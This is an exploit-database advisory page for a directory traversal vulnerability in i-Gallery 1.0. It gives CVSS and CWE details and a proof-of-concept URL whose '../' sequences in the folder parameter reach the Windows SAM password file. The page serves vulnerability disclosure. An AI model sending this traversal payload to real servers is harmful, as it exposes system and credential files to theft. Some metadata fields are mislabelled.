header-logo
Suggest Exploit
vendor:
iGallery
by:
iDEFENSE Labs
7.5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: iGallery
Affected Version From: i-Gallery 1.0
Affected Version To: i-Gallery 1.0
Patch Exists: No
Related CWE: CVE-2004-0753
CPE: a:igallery:igallery:1.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2004-0753/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2004

i-Gallery Directory Traversal Vulnerability

i-Gallery is prone to a directory traversal vulnerability. This could let remote attackers access files on the computer in the context of the Web server process. An example of the vulnerability is http://www.example.com/gallery/folderview.asp?folder=Sport+Champions/../../../../../../../../winnt/repair/sam

Mitigation:

No known mitigation
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/14000/info

i-Gallery is prone to a directory traversal vulnerability.

This could let remote attackers access files on the computer in the context of the Web server process. 

http://www.example.com/gallery/folderview.asp?folder=Sport+Champions/../../../../../../../../winnt/repair

Navigation

Suggest Exploit

Services By CQR